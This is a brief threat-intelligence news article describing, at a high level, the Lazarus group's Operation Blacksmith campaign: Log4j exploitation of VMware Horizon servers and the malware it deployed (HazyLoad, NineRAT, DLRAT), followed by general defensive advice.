HQ/EMEAFind out how we can help your business
The new global campaign called Operation Blacksmith by the notorious North Korea-linked threat group Lazarus targets various industries globally.
This newly discovered malicious operation exploits last year’s Log4j vulnerability (CVE-2021-44228), showcasing the group’s adaptability and persistence in leveraging sophisticated tactics. This campaign, allegedly started last March, has set its sights on the manufacturing, agriculture, and physical security organisations.
Operation Blacksmith initiates its attack by attacking public-facing VMWare Horizon servers.
The initial stage of Operation Blacksmith starts with a calculated strike on publicly facing VMWare Horizon servers to exploit the Log4j flaw. This breach provides Lazarus a gateway into the targeted systems that could initiate their sophisticated infiltration process.
Subsequently, the attackers deploy the HazyLoad proxy tool to establish persistence on the compromised systems. This proxy tool uses another malware variant called BottomLoader, which adds to the group’s multi-layered approach to ensure prolonged access to its targeted system.
However, separate research revealed that the group sometimes deviates from their conventional communication channel and opts for a new remote IP address. This strategic shift complicates the group’s tactics, making detection and mitigation more challenging for defenders.
Once inside the targeted systems, these North Korean hackers generate a different user account that they could leverage to gain admin-level privileges. In the final stage of the attack, Lazarus deploys NineRAT. This malware is a DLang-based payload that could collect system information and harvest sensitive data.
Furthermore, NineRAT uses Telegram as its C2 channel, allowing the threat actors to acquire remotely issued commands, receive system information, and even conduct self-uninstallation or upgrades.
The Lazarus Group’s tendency to change or upgrade its malware arsenal is evident with the inclusion of DLRAT in Operation Blacksmith. This malware is a delivery mechanism for additional payloads, retrieving commands from the C2 and executing them on the infected systems.
These strategic methods show the group’s determination to stay ahead of security measures by continuously evolving its TTPs. Lazarus’ persistent and diverse threat highlights the importance of proactive engagement with threat intelligence-sharing platforms to fortify defences and stay ahead of emerging cyber threats.
Organisations should employ the best cybersecurity solutions to thwart the attacks of these cyber adversaries that continuously refine their tactics.
